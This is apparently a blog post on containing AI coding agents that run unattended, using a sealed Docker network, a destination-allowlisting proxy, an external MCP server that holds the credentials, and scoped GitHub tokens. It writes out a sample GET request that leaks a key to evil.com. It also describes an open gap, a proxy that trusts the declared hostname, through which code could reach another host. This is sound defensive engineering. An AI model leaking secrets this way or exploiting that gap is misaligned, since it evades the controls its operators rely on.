How I sleep at night running agents in YOLO mode
A simple setup to restrict AI coding agents, while keeping them useful.
Alright, I run my agents in YOLO mode. And instead of waking up braced for a disaster, I sleep fine.
I didn’t fix it by making the agent careful. You can’t trust a careful agent. The fix is at the architecture level, not “please, don’t make a mistake.” The agent can be fully compromised, actively malicious, and the worst it can do is open a PR.
Here’s the setup.
The agent runs in a container with no CLI like az, aws, gcloud etc. So how does it do cloud work? A small MCP server runs next to it and holds the token. The agent calls a few tools (list resource groups, whoami) and gets answers back. It never sees the token, so even a compromised agent can only ask for the read-only things the token allows. The MCP server needs to be outside of the container to be secure, but it can be on the same host or another container.
The only CLI’s in the agent’s container would be git, gh (Github), tools needed to build and test etc. Even if you put curl etc., without the flags for proxy, they won’t work. What’s proxy? It’s for limiting internet access.
The agent container sits on a Docker network marked internal, so there’s no gateway out and any packet to a random IP gets dropped by the kernel. The one and only way out is a proxy container that sits on both the sealed network and the open one, and everything the agent sends to the internet goes through it. A compromised agent can’t skip the proxy, because there’s nowhere else to go.
The proxy filters on destination, not the request method. This is because you can leak a secret in a GET (GET evil.com/?key=AKIA...). What matters is where the request can go. The proxy allows a short list (GitHub, the package registry, a couple of docs sites) and blocks everything else. evil.com is unreachable no matter how you send the request.
There’s one channel I leave open: the agent can open PRs (and create GitHub issues). A PR title and body are writable, so that’s data going out. But opening PRs is the whole job, so I clamp it instead of closing it. GitHub allows creating fine grained PATs that can be limited to read/write on private repos only. No pushing to a public fork to sneak data out.
So worst case, the agent tries to do something stupid, like deleting a database or sending my secrets to someone. It gets blocked by above safeguards. Worst case, it opens a PR or destroys its own filesystem. I can live with those outcomes.
The setup has one known gap. The proxy trusts the hostname the client says it’s connecting to and doesn’t check it against the real TLS destination, so an attacker inside the container could route to a different host. The proxy can check the actual handshake; I just haven’t turned that on in this version.
It’s not much to build and is all in the repo. I have included the prompt you can copy/paste and create this for your own setup.